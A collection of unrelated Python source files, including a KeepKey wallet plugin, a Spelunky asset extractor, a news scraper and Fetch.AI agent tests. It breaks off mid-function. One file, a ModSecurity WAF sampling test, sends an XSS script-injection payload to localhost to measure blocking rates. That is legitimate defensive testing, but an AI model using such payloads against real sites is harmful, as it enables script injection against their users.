chatbot_response = requests.post(headers=custom_headers, url=CHATBOT_ENDPOINT, data=json.dumps(request_body))
return chatbot_response.json()
def _get_timestamp():
timestamp = int(time.time() * 1000)
return timestamp
def _make_signature(secret_key, request_body):
secret_key_bytes = bytes(secret_key, 'UTF-8')
signing_key = base64.b64encode(hmac.new(secret_key_bytes, request_body, digestmod=hashlib.sha256).digest())
return signing_key
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_xsh.util import bfh, bh2u, UserCancelled
from electrum_xsh.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum_xsh import constants
from electrum_xsh.i18n import _
from electrum_xsh.plugins import BasePlugin
from electrum_xsh.transaction import deserialize, Transaction
from electrum_xsh.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_xsh.wallet import Standard_Wallet
from electrum_xsh.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "SHIELD"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
assets.py
|
import binascii
import logging
import os
import shutil
import threading
from concurrent.futures import ThreadPoolExecutor, wait
from pathlib import Path
from flask import Blueprint, current_app, render_template, request
from s2_data.assets.assets import (EXTRACTED_DIR, KNOWN_ASSETS, OVERRIDES_DIR,
AssetStore, MissingAsset)
from s2_data.assets.patcher import Patcher
blueprint = Blueprint("assets", __name__)
ASSETS_ROOT = Path("Mods")
EXTRACTED_DIR = ASSETS_ROOT / EXTRACTED_DIR
OVERRIDES_DIR = ASSETS_ROOT / OVERRIDES_DIR
ASSET_DIRS = [
"Data/Fonts",
"Data/Levels/Arena",
"Data/Textures/OldTextures"
]
def get_overrides(install_dir):
dir_ = install_dir / OVERRIDES_DIR
if not dir_.exists():
return None
overrides = []
for root, dirs, files in os.walk(dir_, topdown=True):
dirs[:] = [d for d in dirs if d not in [".compressed"]]
for file_ in files:
overrides.append(Path(root) / file_)
return overrides
@blueprint.route('/')
def assets():
exes = []
# Don't recurse forever. 3 levels should be enough
exes.extend(current_app.config.SPELUNKY_INSTALL_DIR.glob("*.exe"))
exes.extend(current_app.config.SPELUNKY_INSTALL_DIR.glob("*/*.exe"))
exes.extend(current_app.config.SPELUNKY_INSTALL_DIR.glob("*/*/*.exe"))
exes = [
exe.relative_to(current_app.config.SPELUNKY_INSTALL_DIR)
for exe in exes
if exe.name not in ["modlunky2.exe"]
]
overrides = get_overrides(current_app.config.SPELUNKY_INSTALL_DIR)
return render_template("assets.html", exes=exes, overrides=overrides)
def extract_assets(install_dir, exe_filename):
# Make all directories for extraction and overrides
for dir_ in ASSET_DIRS:
(install_dir / EXTRACTED_DIR / dir_).mkdir(parents=True, exist_ok=True)
(install_dir / EXTRACTED_DIR / ".compressed" / dir_).mkdir(
parents=True, exist_ok=True)
(install_dir / OVERRIDES_DIR / dir_).mkdir(parents=True, exist_ok=True)
(install_dir / OVERRIDES_DIR / ".compressed" / dir_).mkdir(
parents=True, exist_ok=True)
with exe_filename.open('rb') as exe:
asset_store = AssetStore.load_from_file(exe)
seen = {}
for filename in KNOWN_ASSETS:
asset = asset_store.find_asset(filename)
name_hash = asset_store.filename_hash(filename)
if asset is None:
logging.info(
"Asset %s not found with hash %s...",
filename.decode(),
repr(binascii.hexlify(name_hash))
)
continue
asset.filename = filename
seen[asset.name_hash] = asset
filepath = Path(filename.decode())
logging.info("Extracting %s.. ", filepath)
asset.load_data(exe)
def extract_single(asset):
try:
logging.info("Extracting %s... ", asset.filename.decode())
asset.extract(install_dir / EXTRACTED_DIR, asset_store.key)
except Exception as err:
logging.error(err)
pool = ThreadPoolExecutor()
futures = [pool.submit(extract_single, asset) for asset in seen.values()]
wait(futures, timeout=300)
for asset in sorted(asset_store.assets, key=lambda a: a.offset):
name_hash = asset_store.filename_hash(asset.filename)
if asset.name_hash not in seen:
logging.warning("Un-extracted Asset %s. Things might not work. :X", asset)
dest = install_dir / EXTRACTED_DIR / "Spel2.exe"
if exe_filename != dest:
logging.info("Backing up exe to %s", dest)
shutil.copy2(exe_filename, dest)
logging.info("Extraction complete!")
@blueprint.route('/extract/', methods=["POST"])
def assets_extract():
exe = current_app.config.SPELUNKY_INSTALL_DIR / request.form['extract-target']
thread = threading.Thread(target=extract_assets, args=(current_app.config.SPELUNKY_INSTALL_DIR, exe))
thread.start()
return render_template("assets_extract.html", exe=exe)
def repack_assets(mods_dir, source_exe, dest_exe):
shutil.copy2(source_exe, dest_exe)
with dest_exe.open("rb+") as dest_file:
asset_store = AssetStore.load_from_file(dest_file)
try:
asset_store.repackage(Path(mods_dir))
except MissingAsset as err:
logging.error("Failed to find expected asset: %s. Unabled to proceed...", err)
return
patcher = Patcher(dest_file)
patcher.patch()
logging.info("Repacking complete!")
@blueprint.route('/repack/', methods=["POST"])
def assets_repack():
source_exe = current_app.config.SPELUNKY_INSTALL_DIR / EXTRACTED_DIR / "Spel2.exe"
dest_exe = current_app.config.SPELUNKY_INSTALL_DIR / "Spel2.exe"
mods_dir = current_app.config.SPELUNKY_INSTALL_DIR / ASSETS_ROOT
thread = threading.Thread(target=repack_assets, args=(mods_dir, source_exe, dest_exe))
thread.start()
return render_template("assets_repack.html", exe=dest_exe)
|
testSampling.py
|
from ftw import ruleset, http, errors
"""
This script assumes that default blocking action is 403
and sampling is one. It will send a know bad request
that is expected to be blocked. If sampling is on it
will only block a certain percentage. We send 1000
requests to verify this. In order to do this we must
also turn off IP Reputation blocking.
SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000"
"""
def send_requests(input_data,subiters,result,index):
http_ua = http.HttpUA()
for i in range(0,subiters):
new_index = str(index)+str(i)
http_ua.send_request(input_data)
result[new_index] = http_ua.response_object.status
def run_requests(iterations):
"""Post request with no content-type AND no content-length"""
x = ruleset.Input(method="GET", protocol="http",port=80,uri='/?X="><script>alert(1);</script>',dest_addr="localhost",headers={"Host":"localhost","User-Agent":"ModSecurity CRS 3 test"})
import threading
returns = {}
threads = []
for i in range(5):
t = threading.Thread(target=send_requests,args=(x,100, returns,i,))
threads.append(t)
t.start()
for t in threads:
t.join()
status_not_403 = 0
status_403 = 0
for status in returns.values():
if status == 403:
status_403 += 1
else:
status_not_403 += 1
x = (status_403/(len(returns)*1.0))*100
y = (status_not_403/(len(returns)*1.0))*100
print "403s =", x
print "not 403s =", y
return (x,y)
def test_sampling():
print "running"
block,passed = run_requests(100)
assert block < 55 and block > 45
|
event_writer.py
|
import Queue
import multiprocessing
import threading
import sys
from collections import Iterable
from .common import log
class EventWriter(object):
def __init__(self, process_safe=False):
if process_safe:
self._mgr = multiprocessing.Manager()
self._event_queue = self._mgr.Queue(1000)
else:
self._event_queue = Queue.Queue(1000)
self._event_writer = threading.Thread(target=self._do_write_events)
self._event_writer.daemon = True
self._started = False
self._exception = False
def start(self):
if self._started:
return
self._started = True
self._event_writer.start()
log.logger.info("Event writer started.")
def tear_down(self):
if not self._started:
return
self._started = False
self._event_queue.put(None)
self._event_writer.join()
log.logger.info("Event writer stopped.")
def isopen(self):
return self._started and (not self._exception)
def write_events(self, events):
if not self.isopen():
return False
if events is None:
return True
self._event_queue.put(events)
return True
def _do_write_events(self):
event_queue = self._event_queue
write = sys.stdout.write
got_shutdown_signal = False
while 1:
try:
event = event_queue.get(timeout=3)
if event is not None:
if isinstance(event, basestring):
write(event)
elif isinstance(event, Iterable):
for evt in event:
write(evt)
else:
log.logger.info("Event writer got tear down signal")
got_shutdown_signal = True
except Queue.Empty:
# We need drain the queue before shutdown
# timeout means empty for now
if got_shutdown_signal:
log.logger.info("Event writer is going to exit...")
break
else:
continue
except Exception:
log.logger.exception("EventWriter encounter exception which may"
"cause data loss, queue leftsize={"
"}".format(
event_queue.qsize()))
self._exception = True
break
log.logger.info("Event writer stopped, queue leftsize={}".format(
event_queue.qsize()))
|
vheap.py
|
from aiohttp import web
import threading
import asyncio
import socketio
import json
import sys
# GLOBALS #
loop = None # Thread loop
sio = None # Socket io
serving = False # To hold status of server
binsheads = {} # To hold bins heads
binschunks = {} # To hold bins chunks
vPath = "" # To hold viewsPath
# Defaults
gport = 8080
ghost = "localhost"
'''
HTTP Server handler: handlers page, and js files requests
'''
def aiohttp_server():
global sio, app
sio = socketio.AsyncServer()
def index(request):
with open('{}vheap.html'.format(vPath)) as f:
return web.Response(text=f.read(), content_type='text/html')
def jsfile(request):
global ghost, gport
with open('{}static/js/'.format(vPath) + request.match_info['name']) as f:
# Fixes JS files GHOST, GPORT before returning (To avoid CORS errors)
return web.Response(text=f.read().replace("GHOST", ghost).replace("GPORT",gport),
content_type='text/javascript');
'''
on connect: do nothing
'''
@sio.on('connect')
async def connected(sid, msg):
pass
'''
on getHeap: send heap data to client
'''
@sio.on('getHeap')
async def getHeap(sid, msg):
await sio.emit("heapData", vheap_makeHeapData())
# Create http server, and socket io
app = web.Application()
sio.attach(app)
# router
app.router.add_get('/', index)
app.router.add_get(r'/static/js/{name}', jsfile)
handler = web.AppRunner(app)
return handler
'''
Http Server thread runner
'''
def vheap_serve_thread(handler):
global serving, ghost, gport, loop
if serving:
return
# gdb does stupid shit sometimes have to do this
if str(ghost) == "None" or str(gport) is "None":
ghost = "localhost"
gport = 8080
serving = True
print("vHeap is now serving on http://" + ghost + ":" + str(gport))
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(handler.setup())
site = web.TCPSite(handler, ghost, gport)
loop.run_until_complete(site.start())
loop.run_forever()
'''
Starts serving vHeap thread
'''
def vheap_serve(host="localhost", port=8080):
global serving, ghost, gport, viewPath
if not serving:
ghost = host
gport = port
t = threading.Thread(target=vheap_serve_thread, args=(aiohttp_server(),))
t.start()
'''
Stops serving vHeap thread
'''
def vheap_stop():
global loop
if serving:
loop.call_soon_threadsafe(loop.stop)
'''
Clears the heap heads, bins
'''
def vheap_clearHeap():
global binsheads, binschunks
binsheads = {}
binschunks = {}
'''
Adds a bin head to heads dict wtih its value
'''
def vheap_addBinHead(head, address):
global binsheads
binsheads[head] = address
'''
Adds a chunks to a specific bin
'''
def vheap_addChunkToBin(bin, chunk):
global binschunks
if not bin in binschunks:
binschunks[bin] = []
binschunks[bin].append(chunk)
'''
Combines heads with bins as json text, ready to be sent to client
'''
def vheap_makeHeapData():
global binsheads, binschunks
ret = { "heads": binsheads, "bins": binschunks }
return json.dumps(ret)
'''
Makes a chunk struct
'''
def vheap_makeChunk(index, address, prevSize, chunkSize, a, m, p, fd, bk):
chunk = {
"index": index,
"address": address,
"prevSize": prevSize,
"chunkSize": chunkSize,
"a": a,
"m": m,
"p": p,
"fd": fd,
"bk": bk
}
return chunk
# Init welcome #
vPath = __file__.replace("vheap.py","vheapViews/");
vheap_clearHeap()
vheap_addBinHead("vHeap is ready", "0x200");
|
main.py
|
from gnewsclient import gnewsclient
from urllib.request import urlopen,Request
from bs4 import BeautifulSoup
from tqdm import tqdm
import json
import pandas as pd
import threading
def search_news(lang,loc,topicc,no_of_results):
# search for news articles
client = gnewsclient.NewsClient(language=lang,
location=loc,
topic=topicc,
max_results=no_of_results)
news_list = client.get_news()
return(news_list)
def extract_text(url):
# given the url of a news article extract all textual content from it
text = ""
try:
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
html = urlopen(req).read()
soup = BeautifulSoup(html, features="html.parser")
# kill all script and style elements
for script in soup(["script", "style"]):
script.extract() # rip it out
# get text
text = soup.get_text()
# break into lines and remove leading and trailing space on each
lines = (line.strip() for line in text.splitlines())
# break multi-headlines into a line each
chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
# drop blank lines
text = '\n'.join(chunk for chunk in chunks if chunk)
except Exception as e:
i = 0
return(text)
def extract_bunch(li,start,end,folder,checkpoint_duration,thread_id):
# extract text from a set of articles
# this is called by each thread
dic = {}
for i in tqdm(range(start,end)):
row = li[i]
if(row[4]=='en'):
row.append(extract_text(row[3]))
dic[i] = row
if i%checkpoint_duration==0:
start_str = str(start)
checkpoint = str(i)
with open(folder + "\\"+str(thread_id)+"_output.json", "w",encoding = "UTF-16") as outfile:
json.dump(dic, outfile)
with open(folder + "\\"+str(thread_id)+"_output.json", "w",encoding = "UTF-16") as outfile:
json.dump(dic, outfile)
return
# input csv file
input_csv = 'news.csv'
df = pd.read_csv(input_csv)
li = df.values.tolist()
nli = []
for r in li:
if r[4] =='en':
nli.append(r)
li = nli
ind = 0
dic = {}
# path to output folder
output_folder = "output\\"
# total number of threads
no_of_threads = 10
# limit the number of articles to search by setting tasks = lets say 100
# 100 can be any number < total headlines
tasks = len(li)
per_thread = tasks//no_of_threads
# checkpoint duration, set the number after which checkpoints are made, 100 is a good number
checkpoint_duration = 100
threads = []
for i in range(0,no_of_threads):
ti = threading.Thread(target=extract_bunch, args=(li,i*per_thread,min((i+1)*per_thread,tasks),output_folder,checkpoint_duration,i))
ti.start()
threads.append(ti)
for thread in threads:
thread.join()
|
test_aea.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for aea/aea.py."""
import os
import tempfile
import time
from pathlib import Path
from threading import Thread
import pytest
from aea import AEA_DIR
from aea.aea import AEA
from aea.aea_builder import AEABuilder
from aea.configurations.base import PublicId
from aea.crypto.fetchai import FETCHAI
from aea.crypto.ledger_apis import LedgerApis
from aea.crypto.wallet import Wallet
from aea.identity.base import Identity
from aea.mail.base import Envelope
from aea.protocols.base import Protocol
from aea.protocols.default.message import DefaultMessage
from aea.protocols.default.serialization import DefaultSerializer
from aea.registries.resources import Resources
from aea.skills.base import Skill
from packages.fetchai.connections.local.connection import LocalNode
from packages.fetchai.protocols.fipa.message import FipaMessage
from packages.fetchai.protocols.fipa.serialization import FipaSerializer
from .conftest import (
CUR_PATH,
DUMMY_SKILL_PUBLIC_ID,
ROOT_DIR,
UNKNOWN_PROTOCOL_PUBLIC_ID,
_make_local_connection,
)
from .data.dummy_aea.skills.dummy.tasks import DummyTask # type: ignore
from .data.dummy_skill.behaviours import DummyBehaviour # type: ignore
def test_initialise_aea():
"""Tests the initialisation of the AEA."""
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name("my_name").add_private_key(FETCHAI, private_key_path)
my_AEA = builder.build()
assert my_AEA.context == my_AEA._context, "Cannot access the Agent's Context"
assert (
not my_AEA.context.connection_status.is_connected
), "AEA should not be connected."
my_AEA.setup()
assert my_AEA.resources is not None, "Resources must not be None after setup"
my_AEA.resources = Resources(str(Path(CUR_PATH, "aea")))
assert my_AEA.resources is not None, "Resources must not be None after set"
assert (
my_AEA.context.shared_state is not None
), "Shared state must not be None after set"
assert my_AEA.context.task_manager is not None
assert my_AEA.context.identity is not None, "Identity must not be None after set."
my_AEA.stop()
def test_act():
"""Tests the act function of the AEA."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(FETCHAI, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
t = Thread(target=agent.start)
try:
t.start()
time.sleep(1.0)
behaviour = agent.resources.get_behaviour(DUMMY_SKILL_PUBLIC_ID, "dummy")
assert behaviour.nb_act_called > 0, "Act() wasn't called"
finally:
agent.stop()
t.join()
def test_react():
"""Tests income messages."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(FETCHAI, private_key_path)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build(connection_ids=[PublicId.from_str("fetchai/local:0.1.0")])
# This is a temporary workaround to feed the local node to the OEF Local connection
# TODO remove it.
list(agent._connections)[0]._local_node = node
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.counterparty = agent.identity.address
message_bytes = DefaultSerializer().encode(msg)
envelope = Envelope(
to=agent.identity.address,
sender=agent.identity.address,
protocol_id=DefaultMessage.protocol_id,
message=message_bytes,
)
t = Thread(target=agent.start)
try:
t.start()
time.sleep(1.0)
agent.outbox.put(envelope)
time.sleep(2.0)
default_protocol_public_id = DefaultMessage.protocol_id
dummy_skill_public_id = DUMMY_SKILL_PUBLIC_ID
handler = agent.resources.get_handler(
default_protocol_public_id, dummy_skill_public_id
)
assert handler is not None, "Handler is not set."
assert (
msg in handler.handled_messages
), "The message is not inside the handled_messages."
except Exception:
raise
finally:
agent.stop()
t.join()
@pytest.mark.asyncio
async def test_handle():
"""Tests handle method of an agent."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(FETCHAI, private_key_path)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
aea = builder.build(connection_ids=[PublicId.from_str("fetchai/local:0.1.0")])
# This is a temporary workaround to feed the local node to the OEF Local connection
# TODO remove it.
list(aea._connections)[0]._local_node = node
t = Thread(target=aea.start)
try:
t.start()
time.sleep(2.0)
